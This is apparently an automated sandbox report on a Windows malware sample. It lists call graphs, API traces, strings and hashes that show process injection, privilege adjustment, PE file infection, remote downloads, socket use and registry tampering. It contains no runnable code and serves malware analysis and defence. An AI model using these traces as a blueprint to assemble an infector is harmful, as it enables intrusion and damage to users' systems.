25629->25632 25630 22fba13 Sleep 25630->25629 25632->25627 25632->25628 25632->25630 25693 22fb79d 16 API calls 25632->25693 25694 22f12c4 25633->25694 25636 22f42cc 25637 22f406f 25637->25636 25696 22ff805 25637->25696 25712 22ffea5 CreateFileA 25637->25712 25719 2300281 17 API calls 25637->25719 25642 2302640 25641->25642 25643 2302684 LoadLibraryA 25642->25643 25644 2302677 Sleep 25642->25644 25646 23026b3 GetProcAddress 25643->25646 25652 23026cb CreateThread 25643->25652 25644->25642 25646->25652 25648 2302749 CreateThread 25649 230276a 25648->25649 25743 2300d09 Sleep 25648->25743 25650 23027a4 CreateThread FindCloseChangeNotification 25649->25650 25651 23027cc 25649->25651 25653 2302781 Sleep 25650->25653 25739 2300b90 25650->25739 25720 2300640 16 API calls 25651->25720 25652->25648 25723 2301e7c 25652->25723 25653->25649 25655 23027e1 25721 2300640 16 API calls 25655->25721 25657 2302833 25658 23027ee 25658->25657 25722 2300992 27 API calls 25658->25722 25661 22fb42b Sleep 25660->25661 25662 22fb438 25660->25662 25661->25662 25811 22fa364 RegOpenKeyExA 25662->25811 25665 22fa364 5 API calls 25666 22fb475 25665->25666 25668 22fbd79 MapViewOfFile 25667->25668 25669 230166f 25668->25669 25670 230168c GlobalFree 25669->25670 25671 23016cc 25670->25671 25673 23016aa 25670->25673 25673->25671 25819 230135e 25673->25819 25675 2303090 2 API calls 25674->25675 25676 22f3db7 25675->25676 25677 2303930 6 API calls 25676->25677 25678 22f3dcb 25677->25678 25847 22f3c90 25678->25847 25680 22f3dd0 Sleep 25683 22f3ddb 25680->25683 25681 22f3eee 25682 22f3e32 CreateThread FindCloseChangeNotification Sleep 25682->25683 25850 22f3a74 25682->25850 25683->25681 25683->25682 25684 2303930 6 API calls 25683->25684 25685 22f3c90 2 API calls 25683->25685 25684->25683 25685->25683 25687 22f3853 25686->25687 25688 22f390e socket 25687->25688 25689 22f393f setsockopt bind 25688->25689 25691 22f393a 25688->25691 25689->25691 25692 22f3988 25689->25692 25690 22f3995 recvfrom 25690->25692 25692->25690 25692->25691 25693->25632 25695 22f12e8 Sleep 25694->25695 25695->25637 25697 22ff882 25696->25697 25698 22ffa7c 25697->25698 25699 22ff8f6 InternetOpenA 25697->25699 25698->25637 25700 22ff91e InternetOpenUrlA 25699->25700 25701 22ffa50 25699->25701 25700->25701 25702 22ff950 25700->25702 25703 22ffa59 InternetCloseHandle 25701->25703 25704 22ffa66 25701->25704 25705 22ff978 InternetReadFile 25702->25705 25706 22ff956 CreateFileA 25702->25706 25703->25704 25704->25698 25707 22ffa6f InternetCloseHandle 25704->25707 25711 22ff9a0 25705->25711 25706->25705 25707->25698 25708 22ffa43 FindCloseChangeNotification 25708->25701 25709 22ff9bc WriteFile 25709->25711 25710 22ffa02 25710->25708 25711->25705 25711->25708 25711->25709 25711->25710 25713 22fff84 GlobalAlloc ReadFile 25712->25713 25718 22fff68 25712->25718 25717 22fffbd 25713->25717 25714 230006c SetFilePointer WriteFile SetFilePointer SetEndOfFile FindCloseChangeNotification 25715 23000d7 25714->25715 25716 23000f3 DeleteFileA 25715->25716 25715->25718 25716->25718 25717->25714 25718->25637 25719->25637 25720->25655 25721->25658 25722->25657 25724 2301ea6 25723->25724 25725 2301f72 Sleep 25724->25725 25726 2301f98 25725->25726 25748 22f621e 25726->25748 25729 2301fb2 CreateFileA 25731 230200c CopyFileA 25729->25731 25732 2301fdd FindCloseChangeNotification 25729->25732 25730 23025fd RtlExitUserThread 25731->25730 25734 230202a 25731->25734 25732->25731 25752 22fcac1 25734->25752 25737 2301d03 7 API calls 25738 230203f 25737->25738 25738->25730 25738->25737 25740 2300b9d 25739->25740 25784 2300858 25740->25784 25744 2300d17 25743->25744 25745 2300d32 25744->25745 25805 2300c04 25744->25805 25747 2300d25 Sleep 25747->25744 25749 22f6280 25748->25749 25750 22f639e 25749->25750 25751 22f6357 GetFileAttributesA 25749->25751 25750->25729 25750->25730 25751->25749 25751->25750 25753 22fcaeb 25752->25753 25754 22fcd8b 25753->25754 25756 22fcdb7 25753->25756 25765 22fcce2 25753->25765 25777 22fb79d 16 API calls 25754->25777 25757 22fce98 GetFileAttributesA SetFileAttributesA 25756->25757 25756->25765 25758 22fcec1 CreateFileA 25757->25758 25762 22fceb5 25757->25762 25759 22fceec 25758->25759 25760 22ff75a FindCloseChangeNotification SetFileAttributesA 25759->25760 25763 22fcf4c CreateFileMappingA 25759->25763 25761 22ff77b DeleteFileA 25760->25761 25760->25762 25761->25762 25764 22ff7de Sleep 25762->25764 25762->25765 25766 22fcf81 MapViewOfFile 25763->25766 25776 22fd157 25763->25776 25764->25765 25765->25738 25770 22fcfa3 25766->25770 25766->25776 25767 22ff6c5 SetFilePointer SetEndOfFile 25769 22ff6fa SetFileTime 25767->25769 25769->25760 25770->25776 25778 22f9abc GetFileAttributesA 25770->25778 25772 22fee15 25773 22fbd79 MapViewOfFile 25772->25773 25772->25776 25775 22fee7a 25773->25775 25775->25776 25779 22f262c 25775->25779 25776->25760 25776->25767 25777->25765 25778->25772 25781 22f263b 25779->25781 25780 22f268a 25780->25776 25781->25780 25783 22f21c4 CreateFileMappingA MapViewOfFile 25781->25783 25783->25780 25785 23008cb CreateFileA 25784->25785 25787 2300916 DeleteFileA 25785->25787 25788 230095d Sleep 25785->25788 25793 22ffa87 Sleep 25787->25793 25789 2300981 RtlExitUserThread 25788->25789 25794 22ffb16 25793->25794 25795 22ffb64 25794->25795 25796 22ffb8f FindFirstFileA 25794->25796 25795->25788 25797 22ffe58 25796->25797 25798 22ffbb0 FindNextFileA 25796->25798 25799 22ffe7a FindClose 25797->25799 25800 22ffe87 Sleep 25797->25800 25798->25797 25802 22ffbc9 25798->25802 25799->25800 25800->25795 25801 22fcac1 16 API calls 25801->25802 25802->25798 25802->25801 25803 22fb79d 16 API calls 25802->25803 25804 22ffa87 16 API calls 25802->25804 25803->25802 25804->25802 25809 2300c58 25805->25809 25806 2300c60 RegEnumValueA 25808 2300ccb 25806->25808 25806->25809 25807 2300cf7 RegCloseKey 25807->25747 25808->25807 25809->25806 25809->25807 25810 22fcac1 16 API calls 25809->25810 25810->25809 25812 22fa38e 25811->25812 25813 22fa46d 25811->25813 25814 22fa39c RegEnumValueA 25812->25814 25813->25665 25815 22fa3c1 RegDeleteValueA 25814->25815 25817 22fa3e2 25814->25817 25815->25814 25816 22fa3f0 RegEnumKeyExA 25816->25813 25816->25817 25817->25816 25818 22fa449 RegDeleteKeyA 25817->25818 25818->25816 25821 2301394 25819->25821 25820 23015b7 25820->25673 25821->25820 25822 23014b6 25821->25822 25826 2300d40 12 API calls 25821->25826 25822->25820 25823 2301553 CreateMutexA 25822->25823 25824 2301586 FindCloseChangeNotification 25822->25824 25827 2300d40 25822->25827 25823->25822 25824->25822 25826->25822 25833 2300d6a 25827->25833 25828 2300fe3 25829 2301017 GetTokenInformation 25828->25829 25846 2300e8c 25828->25846 25831 2301041 25829->25831 25829->25846 25830 23012fe FindCloseChangeNotification 25832 2301315 25830->25832 25835 2301089 GetTokenInformation 25831->25835 25831->25846 25832->25822 25833->25828 25834 2300efd LookupPrivilegeValueA AdjustTokenPrivileges 25833->25834 25833->25846 25836 2300f68 25834->25836 25834->25846 25837 23010bd 25835->25837 25835->25846 25838 2300f9f AdjustTokenPrivileges FindCloseChangeNotification 25836->25838 25836->25846 25839 230111c lstrcmpiA 25837->25839 25837->25846 25838->25828 25838->25846 25840 230115e CreateMutexA 25839->25840 25841 2301132 25839->25841 25840->25846 25841->25840 25842 2301178 VirtualAllocEx 25841->25842 25844 23011b0 WriteProcessMemory 25842->25844 25842->25846 25845 23011e2 CreateRemoteThread 25844->25845 25844->25846 25845->25846 25846->25830 25846->25832 25848 2303090 2 API calls 25847->25848 25849 22f3cb3 25848->25849 25849->25680 25851 22f3a9e 25850->25851 25860 22f2e87 25851->25860 25854 22f3bc4 25857 22f3be6 25854->25857 25872 22f31c3 CreateFileMappingA MapViewOfFile 25854->25872 25855 22f2e87 9 API calls 25855->25854 25856 22f3c28 25857->25856 25873 22f2be1 CreateFileMappingA MapViewOfFile 25857->25873 25861 23078a0 25860->25861 25862 22f2e94 socket 25861->25862 25863 22f303b 25862->25863 25864 22f2f08 25862->25864 25863->25854 25863->25855 25863->25856 25865 22f262c 2 API calls 25864->25865 25866 22f2f26 25865->25866 25866->25863 25867 22f2f3c sendto 25866->25867 25867->25863 25868 22f2f68 select 25867->25868 25868->25863 25870 22f3040 25868->25870 25870->25863 25871 22f226c 4 API calls 25870->25871 25871->25863 25872->25857 25873->25856 25874 23012eb FindCloseChangeNotification 26007 401ba0 172 API calls 25915 4064a9 102 API calls _sprintf 26009 40efac 75 API calls 6 library calls 25455 22f406f 17 API calls 25947 406db0 172 API calls ___crtsetenv 25948 4085b0 183 API calls 2 library calls 25506 2303cc1 RegQueryValueExA RegCloseKey 25981 41aeb0 75 API calls __cinit 25507 230208f 8 API calls 25982 404e75 196 API calls 3 library calls 25916 40a4b9 213 API calls 2 library calls 25878 22f19d2 RegSetValueExA RegSetValueExA RegCloseKey 26011 47cfb9 WideCharToMultiByte

                                  Executed Functions

                                  Function 00403260 Relevance: 201.8, APIs: 26, Strings: 89, Instructions: 515libraryloaderwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 403260-4032af call 403e70 GetModuleHandleA GetProcAddress 3 4032b1-4032c5 GetCurrentProcess 0->3 4 403303-40330f 0->4 3->4 11 4032c7-4032cb 3->11 5 403313-403336 4->5 6 403364-403371 5->6 7 403338-40333e 5->7 6->5 10 403373-4033ac call 40bc1d 6->10 9 403340-40334b 7->9 9->9 13 40334d-403351 9->13 20 4033d8-40359d call 4010c0 * 16 10->20 21 4033ae-4033d5 10->21 11->4 12 4032cd-4032fe call 40c051 MessageBoxA call 40c866 11->12 12->4 16 403353-40335a 13->16 17 40335c-403360 13->17 16->17 17->6 55 4035a0-4035c1 20->55 21->20 55->55 56 4035c3-403698 GetWindowsDirectoryA call 401c90 GetSystemDirectoryA call 401c90 call 401b50 call 401c90 GetCurrentDirectoryA call 401c90 call 40bc90 SHGetFolderPathA 55->56 69 40369a-4036a7 PathAppendA 56->69 70 4036ad-4036d5 call 401c90 SHGetFolderPathA 56->70 69->70 73 4036d7-4036e6 call 401c90 70->73 74 4036eb-40392f SHGetSpecialFolderPathA call 401c90 SHGetSpecialFolderPathA call 401c90 call 40c553 call 401c90 call 40c553 call 401c90 SHGetSpecialFolderPathA call 401c90 GetUserDefaultLangID call 40c051 call 401c90 call 40c051 call 401c90 * 2 GetModuleFileNameA call 401c90 * 2 call 401300 call 401c90 GetComputerNameA call 401c90 GetUserNameA call 401c90 GetVersionExA call 40c051 call 401c90 call 40c051 call 401c90 70->74 73->74 120 403931-403934 74->120 121 4039ae-4039c5 call 401c90 74->121 122 4039f9-403a24 call 401c90 call 40c042 120->122 123 40393a-403952 call 401c90 120->123 130 4039c7-4039ca 121->130 131 4039e8 121->131 133 403954-403959 123->133 134 40395e-403961 123->134 135 4039e1-4039e6 130->135 136 4039cc-4039d1 130->136 137 4039ed 131->137 133->137 139 403963-403968 134->139 140 40396d-403970 134->140 135->137 141 4039d3-4039d8 136->141 142 4039da-4039df 136->142 143 4039ef-4039f4 call 401c90 137->143 139->137 144 4039a2-4039a5 140->144 145 403972-403978 140->145 141->143 142->143 143->122 144->122 147 4039a7-4039ac 144->147 148 40397a-40397d 145->148 149 40399b-4039a0 145->149 147->137 150 403994-403999 148->150 151 40397f-403984 148->151 149->137 150->137 152 403986-40398b 151->152 153 40398d-403992 151->153 152->143 153->143
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040329C
                                  • GetProcAddress.KERNEL32(00000000), ref: 004032A3
                                  • GetCurrentProcess.KERNEL32(?), ref: 004032BA
                                  • _sprintf.LIBCMT ref: 004032DF
                                  • MessageBoxA.USER32(?,?,Fatal Error,00000010), ref: 004032F7
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004035D0
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004035F7
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00403647
                                  • _memset.LIBCMT ref: 00403676
                                  • SHGetFolderPathA.SHELL32(00000000,00008023,00000000,00000000,?), ref: 00403694
                                  • PathAppendA.SHLWAPI(?,NVIDIA), ref: 004036A7
                                  • SHGetFolderPathA.SHELL32(00000000,00008023,00000000,00000000,?), ref: 004036D1
                                  • SHGetSpecialFolderPathA.SHELL32(?,?,00000017,00000000), ref: 004036FD
                                  • SHGetSpecialFolderPathA.SHELL32(?,?,00000019,00000000), ref: 0040371F
                                  • _getenv.LIBCMT ref: 0040373A
                                  • _getenv.LIBCMT ref: 00403754
                                  • SHGetSpecialFolderPathA.SHELL32(?,?,00000026,00000000), ref: 00403775
                                  • GetUserDefaultLangID.KERNEL32 ref: 0040378B
                                  • _sprintf.LIBCMT ref: 004037A5
                                  • _sprintf.LIBCMT ref: 004037D5
                                    • Part of subcall function 0040C051: __output_l.LIBCMT ref: 0040C0A4
                                    • Part of subcall function 00401C90: _sprintf.LIBCMT ref: 00401D29
                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00403816
                                  • GetComputerNameA.KERNEL32 ref: 00403872
                                  • GetUserNameA.ADVAPI32(?,?), ref: 00403899
                                  • GetVersionExA.KERNEL32(?,?,?,?,?,?), ref: 004038C0
                                  • _sprintf.LIBCMT ref: 004038D8
                                    • Part of subcall function 0040C051: __flsbuf.LIBCMT ref: 0040C0BF
                                  • _sprintf.LIBCMT ref: 00403906
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Path_sprintf$Folder$DirectoryNameSpecial$CurrentModuleTimeUser_fputs_getenv$AddressAppendComputerDebugDefaultFileFormatHandleLangLocalMessageMutexObjectOutputProcProcessReleaseSingleStringSystemVersionWaitWindows__flsbuf__output_l_fprintf_memset
                                  • String ID: 0PB$A dir will be applied to the given path and for each file found it sets variable {current file} to that file and calls the given command.$ALLUSERSPROFILE$ALLUSERSPROFILEDir$Allows waiting for a specific registry key or value to be deleted$Call$Command$Command Name$CommandClass::CommandClass$Computer Name$Control\Class$Current Parser Name$Current Parser Path$Currentdir$Data$Defines the variable if not defined and Sets the its value to the given value.If [=Value] is not given it undefines the given variable$DirAndApply$DirPath,Command $DriverBaseRegPath$Echo$Eval$Exact path to App + arguments$Executes all the commands in that file and returns$Executes command if Exp1 is the same as Exp2 for = or Exp1 has Exp2 for % if ! is added to the beging of Exp1 it will negate the result$Executes the given system command (returns immidiately)$Fatal Error$Filename$Help$I386$If <Command Name> is provided displayes syntax and description of that command otherwise displays all the avilable commands$IsWow64Process$Language Resource$Language Resource %d$NVIDIA$Name[=Value] $OS Major Version$OS Minor Version$Opens the given log files ad Logs all the commands in the given file$Outputs data after evaluation$Path to an NVU File$Platform$Primary Language Resource$ProgramFilesDir$Run$Run all the commands in this file and delete the file$RunOnce$Section Name$Services\Class$Set$Shows the given bitmap for the given time number on the screen$Sleep$Splash$StartLogging$StopLogging$Stops logging close the file$SysCallAndWait$System$USERPROFILE$USERPROFILEDir$Unknown WIN32 NT5$Unknown WIN32 Windows$User Name$WaitOnRegDel$Waits for a number of miliseconds passed before executing the next command$Win2K$Win7$Win95$Win98$WinME$WinNT4$WinServer2003Family$WinVista$WinXP$You are running a 32 bit version of Nvidia uninstaller on a 64 bit system (Binary type %s).Wrong version of uninstaller. Uninstaller exits now.$[!]Exp1}[=%]{Exp2} then {Command$call and wait untill app is done.$commondesktop$commonprograms$kernel32$milisconds$milisconds}, {BitmapPath$pgmdir$reEvaluates the given command and executes it$runs all the commands in that section and returnd and continues executing commands after that line$sysdir$syswow64dir$windir$wrkdir${Key,Value,LoopDelay,MaxLoopCount,TimeoutCommand
                                  • API String ID: 3787303011-104186289
                                  • Opcode ID: c7b1109d8d7fe42fc13c850b3191039402dc4bd9570320ae813f2569530abb39
                                  • Instruction ID: 5e0c39b89a0a37415d1c05462954512994c9776a5e82db3148113b3a6bc72530
                                  • Opcode Fuzzy Hash: c7b1109d8d7fe42fc13c850b3191039402dc4bd9570320ae813f2569530abb39
                                  • Instruction Fuzzy Hash: E502A3713C4344AFC620AF508C96FFE7698AB84745F10443FB94AB61D1DBBC99888B9D
                                  Function 0047C11B Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 155librarysleepfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 185 47c11b-47c135 186 47c137-47c14b 185->186 187 47c150-47c15a 185->187 188 47c1d2-47c23c LoadLibraryA call 47c365 call 47c36a SetErrorMode CreateFileMappingA * 2 186->188 189 47c15c-47c168 187->189 190 47c16a-47c173 187->190 204 47c23e-47c252 MapViewOfFile 188->204 205 47c278-47c298 CreateThread 188->205 191 47c174-47c179 189->191 190->191 194 47c180-47c18b 191->194 195 47c17b 191->195 198 47c192-47c1cc call 47c38b call 47c365 call 47c38b call 47c365 194->198 199 47c18d 194->199 197 47c2c2-47c2c9 195->197 202 47c357-47c360 197->202 203 47c2cf-47c2e5 GetModuleFileNameA 197->203 198->188 199->197 202->197 207 47c2e7-47c30e LoadLibraryA GetProcAddress 203->207 208 47c344-47c349 Sleep 203->208 204->205 210 47c254-47c261 204->210 213 47c29e-47c2a5 205->213 207->208 209 47c310-47c342 CreateMutexA GetLastError 207->209 211 47c34f-47c351 ExitProcess 208->211 209->208 209->211 210->205 215 47c263-47c274 210->215 216 47c2a7-47c2af 213->216 217 47c2b1-47c2c0 Sleep 213->217 215->205 220 47c276 215->220 216->213 217->197 217->213 220->205
                                  APIs
                                  • LoadLibraryA.KERNELBASE(KERNEL32.DLL), ref: 0047C1D9
                                    • Part of subcall function 0047C36A: GetProcAddress.KERNELBASE(75550000,CloseHandle), ref: 0047C374
                                  • SetErrorMode.KERNEL32(00008002), ref: 0047C200
                                  • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,l8geqpHJTkdns0), ref: 0047C21A
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_90830), ref: 0047C234
                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0047C24A
                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,0047C796), ref: 0047C298
                                  • Sleep.KERNEL32(0000000C), ref: 0047C2B3
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LisectAVT_2403002B_38.exe,000001FE,75550000,LoadLibraryA), ref: 0047C2DD
                                  • LoadLibraryA.KERNELBASE(SHELL32.DLL), ref: 0047C2F8
                                  • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0047C306
                                  • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0047C333
                                  • GetLastError.KERNEL32(00000000), ref: 0047C33A
                                  • Sleep.KERNEL32(000927C0), ref: 0047C349
                                  • ExitProcess.KERNEL32(00000000), ref: 0047C351
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CreateFile$AddressErrorLibraryLoadMappingProcSleep$ExitLastModeModuleMutexNameProcessThreadView
                                  • String ID: """"$3333$Ap1mutx7$C:\Users\user\Desktop\LisectAVT_2403002B_38.exe$GetProcAddress$KERNEL32.DLL$LoadLibraryA$SHELL32.DLL$ShellExecuteA$l8geqpHJTkdns0$open$purity_control_90830
                                  • API String ID: 496405446-4165867204
                                  • Opcode ID: c63a345c9f1db3f00a854740f14354582dd33e4d8cc0bff97de8b0f78c264116
                                  • Instruction ID: 98630bb871ff8f82f1be8d53fa777d51ab6f49751e6c0cdc5617d2350871ea1c
                                  • Opcode Fuzzy Hash: c63a345c9f1db3f00a854740f14354582dd33e4d8cc0bff97de8b0f78c264116
                                  • Instruction Fuzzy Hash: CD517170640288ABDF10DFA0CC88FD93769EF44B05F54856AEE0DBE1B1C67556408B1E
                                  Function 022FCAC1 Relevance: 39.5, APIs: 12, Strings: 9, Instructions: 2706fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?), ref: 022FCE9C
                                  • SetFileAttributesA.KERNEL32(?,00000020), ref: 022FCEAB
                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 022FCED7
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,027E7000,00000000), ref: 022FCF68
                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 022FCF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate$MappingView
                                  • String ID: $($<$PE$`$d$d$d$h*U
                                  • API String ID: 1961427682-4248685410
                                  • Opcode ID: ea33ed159c2f696c64356d913cb0dfe59a19a15a463c009ba6876bce969a8140
                                  • Instruction ID: 9942e1a06d6ac1687226467567146d072835b339b885f0d64b0e2f9c2f45c8bb
                                  • Opcode Fuzzy Hash: ea33ed159c2f696c64356d913cb0dfe59a19a15a463c009ba6876bce969a8140
                                  • Instruction Fuzzy Hash: 0B438CB1D102299BDB64CF94CD94BEEB3B6FB48304F0481E9D20DA7285DB35AA85CF54
                                  Function 02300D40 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 382COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 960 2300d40-2300e3e call 23078a0 964 2300ff1-2301009 960->964 965 2300e44-2300e4d 960->965 970 2301017-2301033 GetTokenInformation 964->970 971 230100b-2301012 964->971 968 2300e53-2300e8a 965->968 969 2300fe5-2300fec 965->969 978 2300e98-2300ebc 968->978 979 2300e8c-2300e93 968->979 972 23012f5-23012fc 969->972 973 2301041-230104a 970->973 974 2301035-230103c 970->974 971->972 976 2301315-230131c 972->976 977 23012fe-230130b FindCloseChangeNotification 972->977 985 2301058-230107b 973->985 986 230104c-2301053 973->986 974->972 980 230132b-2301332 976->980 981 230131e-2301324 976->981 977->976 992 2300efd-2300f4d LookupPrivilegeValueA AdjustTokenPrivileges 978->992 993 2300ebe-2300ec9 978->993 979->972 983 2301334-2301343 980->983 984 230134a-230135d 980->984 981->980 983->984 994 2301089-23010af GetTokenInformation 985->994 995 230107d-2301084 985->995 986->972 996 2300f68-2300f73 992->996 997 2300f4f-2300f63 992->997 1003 2300ed7-2300eef 993->1003 1004 2300ecb-2300ed2 993->1004 998 23010b1-23010b8 994->998 999 23010bd-2301103 994->999 995->972 1006 2300f75-2300f89 996->1006 1007 2300f8e-2300fd5 AdjustTokenPrivileges FindCloseChangeNotification 996->1007 997->972 998->972 1009 2301111-230111a 999->1009 1010 2301105-230110c 999->1010 1003->992 1020 2300ef1-2300ef8 1003->1020 1004->972 1006->972 1015 2300fe3 1007->1015 1016 2300fd7-2300fde 1007->1016 1012 230117a-2301181 1009->1012 1013 230111c-2301130 lstrcmpiA 1009->1013 1010->972 1012->972 1018 2301132-2301146 1013->1018 1019 230115e-2301173 CreateMutexA 1013->1019 1015->964 1016->972 1018->1019 1022 2301148-230115c 1018->1022 1019->972 1020->972 1022->1019 1024 2301178-23011ae VirtualAllocEx 1022->1024 1026 23011b0-23011d4 WriteProcessMemory 1024->1026 1027 2301217-230123f 1024->1027 1028 23011e2-2301202 CreateRemoteThread 1026->1028 1029 23011d6-23011dd 1026->1029 1033 2301245-230129f call 2306e8b * 2 1027->1033 1034 23012dc-23012e3 1027->1034 1030 2301210 1028->1030 1031 2301204-230120b 1028->1031 1029->972 1030->1027 1031->972 1041 23012a1-23012a8 1033->1041 1042 23012aa-23012ca 1033->1042 1034->972 1041->972 1044 23012d5 1042->1044 1045 23012cc-23012d3 1042->1045 1044->1034 1045->972
                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02301305
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID: P
                                  • API String ID: 2591292051-3110715001
                                  • Opcode ID: d7d3b9d1a789c558d900b5ca93480853ac344cddb0975a5b9200eae160cc999c
                                  • Instruction ID: f25bbb02c04c0cd3a4f9d2fa38c0aa71418dfd6b4b1a3e638131740a40191ae7
                                  • Opcode Fuzzy Hash: d7d3b9d1a789c558d900b5ca93480853ac344cddb0975a5b9200eae160cc999c
                                  • Instruction Fuzzy Hash: F0F161B5E40218EBEB24CFA4CC98BEE777CFB08714F104698E659A61C0D7B45A95CF60
                                  Function 022FFA87 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 299sleepfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
